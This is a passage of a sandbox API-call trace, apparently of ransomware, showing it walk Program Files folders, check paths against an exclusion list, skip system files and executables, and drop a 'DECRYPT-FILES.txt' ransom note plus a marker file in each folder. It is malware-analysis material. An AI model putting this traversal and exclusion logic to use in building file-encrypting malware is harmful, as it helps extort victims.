lpString2="Windows Media Player\\" | out: lpString1="C:\\Program Files\\Windows Media Player\\") returned="C:\\Program Files\\Windows Media Player\\" [0071.420] StrStrW (lpFirst="C:\\Program Files\\Windows Media Player\\", lpSrch="SQL") returned 0x0 [0071.420] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0071.420] lstrcmpW (lpString1="Windows NT", lpString2=".") returned 1 [0071.420] lstrcmpW (lpString1="Windows NT", lpString2="..") returned 1 [0071.420] lstrcatW (in: lpString1="Windows NT", lpString2="\\" | out: lpString1="Windows NT\\") returned="Windows NT\\" [0071.420] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows NT\\" | out: lpString1="C:\\Program Files\\Windows NT\\") returned="C:\\Program Files\\Windows NT\\" [0071.420] StrStrW (lpFirst="C:\\Program Files\\Windows NT\\", lpSrch="SQL") returned 0x0 [0071.420] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x88254af0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x88254af0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0071.420] lstrcmpW (lpString1="Windows Photo Viewer", lpString2=".") returned 1 [0071.420] lstrcmpW (lpString1="Windows Photo Viewer", lpString2="..") returned 1 [0071.420] lstrcatW (in: lpString1="Windows Photo Viewer", lpString2="\\" | out: lpString1="Windows Photo Viewer\\") returned="Windows Photo Viewer\\" [0071.420] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Photo Viewer\\" | out: lpString1="C:\\Program Files\\Windows Photo Viewer\\") returned="C:\\Program Files\\Windows Photo Viewer\\" [0071.420] StrStrW (lpFirst="C:\\Program Files\\Windows Photo Viewer\\", lpSrch="SQL") returned 0x0 [0071.420] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8827ac50, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8827ac50, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0071.420] lstrcmpW (lpString1="Windows Portable Devices", lpString2=".") returned 1 [0071.420] lstrcmpW (lpString1="Windows Portable Devices", lpString2="..") returned 1 [0071.420] lstrcatW (in: lpString1="Windows Portable Devices", lpString2="\\" | out: lpString1="Windows Portable Devices\\") returned="Windows Portable Devices\\" [0071.420] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Portable Devices\\" | out: lpString1="C:\\Program Files\\Windows Portable Devices\\") returned="C:\\Program Files\\Windows Portable Devices\\" [0071.420] StrStrW (lpFirst="C:\\Program Files\\Windows Portable Devices\\", lpSrch="SQL") returned 0x0 [0071.420] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0071.420] lstrcmpW (lpString1="Windows Sidebar", lpString2=".") returned 1 [0071.420] lstrcmpW (lpString1="Windows Sidebar", lpString2="..") returned 1 [0071.420] lstrcatW (in: lpString1="Windows Sidebar", lpString2="\\" | out: lpString1="Windows Sidebar\\") returned="Windows Sidebar\\" [0071.420] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Sidebar\\" | out: lpString1="C:\\Program Files\\Windows Sidebar\\") returned="C:\\Program Files\\Windows Sidebar\\" [0071.420] StrStrW (lpFirst="C:\\Program Files\\Windows Sidebar\\", lpSrch="SQL") returned 0x0 [0071.420] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar\\", cAlternateFileName="WI4223~1")) returned 0 [0071.420] FindClose (in: hFindFile=0x5f8bd8 | out: hFindFile=0x5f8bd8) returned 1 [0071.420] CloseHandle (hObject=0x418) returned 1 [0071.421] FindNextFileW (in: hFindFile=0x5f8ad8, lpFindFileData=0x3f2f8c4 | out: lpFindFileData=0x3f2f8c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x625898, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0071.421] lstrcmpW (lpString1="Program Files (x86)", lpString2=".") returned 1 [0071.421] lstrcmpW (lpString1="Program Files (x86)", lpString2="..") returned 1 [0071.421] lstrcatW (in: lpString1="Program Files (x86)", lpString2="\\" | out: lpString1="Program Files (x86)\\") returned="Program Files (x86)\\" [0071.421] lstrcatW (in: lpString1="C:\\", lpString2="Program Files (x86)\\" | out: lpString1="C:\\Program Files (x86)\\") returned="C:\\Program Files (x86)\\" [0071.421] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\Program Files") returned="\\Program Files (x86)\\" [0071.421] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch=":\\Windows") returned 0x0 [0071.421] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\Games\\") returned 0x0 [0071.421] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.421] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.421] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.421] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.421] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.421] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\All Users") returned 0x0 [0071.421] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.421] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.421] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.421] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="AhnLab") returned 0x0 [0071.421] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.421] lstrlenW (lpString="C:\\Program Files (x86)\\") returned 23 [0071.421] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.421] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\Program Files (x86)\\\\jkbimi8.tmp") returned 35 [0071.421] CreateFileW (lpFileName="C:\\Program Files (x86)\\\\jkbimi8.tmp" (normalized: "c:\\program files (x86)\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x418 [0071.422] lstrlenW (lpString="C:\\Program Files (x86)\\") returned 23 [0071.422] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.422] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\Program Files (x86)\\\\DECRYPT-FILES.txt") returned 41 [0071.422] CreateFileW (lpFileName="C:\\Program Files (x86)\\\\DECRYPT-FILES.txt" (normalized: "c:\\program files (x86)\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0071.422] WriteFile (in: hFile=0x41c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2ee24, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2ee24*=0x23fc, lpOverlapped=0x0) returned 1 [0071.423] CloseHandle (hObject=0x41c) returned 1 [0071.423] lstrlenW (lpString="C:\\Program Files (x86)\\") returned 23 [0071.423] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="*" | out: lpString1="C:\\Program Files (x86)\\*") returned="C:\\Program Files (x86)\\*" [0071.423] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*", lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6cb4540, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cb4540, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8bd8 [0071.423] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.423] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6cb4540, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cb4540, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.423] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.423] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.423] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x886a52d0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x886a52d0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0071.423] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0071.423] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0071.424] lstrcatW (in: lpString1="Adobe", lpString2="\\" | out: lpString1="Adobe\\") returned="Adobe\\" [0071.424] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Adobe\\" | out: lpString1="C:\\Program Files (x86)\\Adobe\\") returned="C:\\Program Files (x86)\\Adobe\\" [0071.424] StrStrW (lpFirst="C:\\Program Files (x86)\\Adobe\\", lpSrch="SQL") returned 0x0 [0071.424] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbdc44680, ftLastAccessTime.dwHighDateTime=0x1d301bd, ftLastWriteTime.dwLowDateTime=0xbdc44680, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0071.424] lstrcmpW (lpString1="Common Files", lpString2=".") returned 1 [0071.424] lstrcmpW (lpString1="Common Files", lpString2="..") returned 1 [0071.424] lstrcatW (in: lpString1="Common Files", lpString2="\\" | out: lpString1="Common Files\\") returned="Common Files\\" [0071.424] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Common Files\\" | out: lpString1="C:\\Program Files (x86)\\Common Files\\") returned="C:\\Program Files (x86)\\Common Files\\" [0071.424] StrStrW (lpFirst="C:\\Program Files (x86)\\Common Files\\", lpSrch="SQL") returned 0x0 [0071.424] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6cb4540, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6cb4540, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cb4540, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.424] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.424] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.424] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0071.424] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0071.424] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0071.424] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0071.424] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xa547efa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xa547efa0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0071.424] lstrcmpW (lpString1="Google", lpString2=".") returned 1 [0071.424] lstrcmpW (lpString1="Google", lpString2="..") returned 1 [0071.424] lstrcatW (in: lpString1="Google", lpString2="\\" | out: lpString1="Google\\") returned="Google\\" [0071.424] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Google\\" | out: lpString1="C:\\Program Files (x86)\\Google\\") returned="C:\\Program Files (x86)\\Google\\" [0071.424] StrStrW (lpFirst="C:\\Program Files (x86)\\Google\\", lpSrch="SQL") returned 0x0 [0071.424] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0071.424] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0071.424] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0071.424] lstrcatW (in: lpString1="Internet Explorer", lpString2="\\" | out: lpString1="Internet Explorer\\") returned="Internet Explorer\\" [0071.424] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Internet Explorer\\" | out: lpString1="C:\\Program Files (x86)\\Internet Explorer\\") returned="C:\\Program Files (x86)\\Internet Explorer\\" [0071.424] StrStrW (lpFirst="C:\\Program Files (x86)\\Internet Explorer\\", lpSrch="SQL") returned 0x0 [0071.424] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x734f7d60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x734f7d60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0071.424] lstrcmpW (lpString1="Java", lpString2=".") returned 1 [0071.424] lstrcmpW (lpString1="Java", lpString2="..") returned 1 [0071.424] lstrcatW (in: lpString1="Java", lpString2="\\" | out: lpString1="Java\\") returned="Java\\" [0071.424] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Java\\" | out: lpString1="C:\\Program Files (x86)\\Java\\") returned="C:\\Program Files (x86)\\Java\\" [0071.424] StrStrW (lpFirst="C:\\Program Files (x86)\\Java\\", lpSrch="SQL") returned 0x0 [0071.425] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6cb4540, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6cb4540, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cb4540, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.425] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.425] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.425] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.425] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.425] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.425] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.425] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.425] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.425] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.425] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.425] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.425] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.425] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.425] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.425] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.425] lstrlenW (lpString="C:\\Program Files (x86)\\") returned 23 [0071.425] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.425] lstrcpyW (in: lpString1=0x3f2ee18, lpString2="C:\\Program Files (x86)\\" | out: lpString1="C:\\Program Files (x86)\\") returned="C:\\Program Files (x86)\\" [0071.425] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Program Files (x86)\\jkbimi8.tmp") returned="C:\\Program Files (x86)\\jkbimi8.tmp" [0071.425] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.425] CreateFileW (lpFileName="C:\\Program Files (x86)\\jkbimi8.tmp" (normalized: "c:\\program files (x86)\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.425] CloseHandle (hObject=0x0) returned 0 [0071.425] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.426] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x8827ac50, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8827ac50, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0071.426] lstrcmpW (lpString1="Microsoft Analysis Services", lpString2=".") returned 1 [0071.426] lstrcmpW (lpString1="Microsoft Analysis Services", lpString2="..") returned 1 [0071.426] lstrcatW (in: lpString1="Microsoft Analysis Services", lpString2="\\" | out: lpString1="Microsoft Analysis Services\\") returned="Microsoft Analysis Services\\" [0071.426] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Microsoft Analysis Services\\" | out: lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\") returned="C:\\Program Files (x86)\\Microsoft Analysis Services\\" [0071.426] StrStrW (lpFirst="C:\\Program Files (x86)\\Microsoft Analysis Services\\", lpSrch="SQL") returned 0x0 [0071.426] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef0a44f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0071.426] lstrcmpW (lpString1="Microsoft Office", lpString2=".") returned 1 [0071.426] lstrcmpW (lpString1="Microsoft Office", lpString2="..") returned 1 [0071.426] lstrcatW (in: lpString1="Microsoft Office", lpString2="\\" | out: lpString1="Microsoft Office\\") returned="Microsoft Office\\" [0071.426] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Microsoft Office\\" | out: lpString1="C:\\Program Files (x86)\\Microsoft Office\\") returned="C:\\Program Files (x86)\\Microsoft Office\\" [0071.426] StrStrW (lpFirst="C:\\Program Files (x86)\\Microsoft Office\\", lpSrch="SQL") returned 0x0 [0071.426] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1120b5b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1120b5b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Visual Studio 8", cAlternateFileName="MICROS~3")) returned 1 [0071.426] lstrcmpW (lpString1="Microsoft Visual Studio 8", lpString2=".") returned 1 [0071.426] lstrcmpW (lpString1="Microsoft Visual Studio 8", lpString2="..") returned 1 [0071.426] lstrcatW (in: lpString1="Microsoft Visual Studio 8", lpString2="\\" | out: lpString1="Microsoft Visual Studio 8\\") returned="Microsoft Visual Studio 8\\" [0071.426] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Microsoft Visual Studio 8\\" | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\" [0071.426] StrStrW (lpFirst="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\", lpSrch="SQL") returned 0x0 [0071.426] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f1bbe30, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.NET", cAlternateFileName="MICROS~1.NET")) returned 1 [0071.426] lstrcmpW (lpString1="Microsoft.NET", lpString2=".") returned 1 [0071.426] lstrcmpW (lpString1="Microsoft.NET", lpString2="..") returned 1 [0071.426] lstrcatW (in: lpString1="Microsoft.NET", lpString2="\\" | out: lpString1="Microsoft.NET\\") returned="Microsoft.NET\\" [0071.426] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Microsoft.NET\\" | out: lpString1="C:\\Program Files (x86)\\Microsoft.NET\\") returned="C:\\Program Files (x86)\\Microsoft.NET\\" [0071.426] StrStrW (lpFirst="C:\\Program Files (x86)\\Microsoft.NET\\", lpSrch="SQL") returned 0x0 [0071.426] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeef6000, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x88254af0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x88254af0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Firefox", cAlternateFileName="MOZILL~1")) returned 1 [0071.426] lstrcmpW (lpString1="Mozilla Firefox", lpString2=".") returned 1 [0071.426] lstrcmpW (lpString1="Mozilla Firefox", lpString2="..") returned 1 [0071.427] lstrcatW (in: lpString1="Mozilla Firefox", lpString2="\\" | out: lpString1="Mozilla Firefox\\") returned="Mozilla Firefox\\" [0071.427] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Mozilla Firefox\\" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\") returned="C:\\Program Files (x86)\\Mozilla Firefox\\" [0071.427] StrStrW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\", lpSrch="SQL") returned 0x0 [0071.427] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, 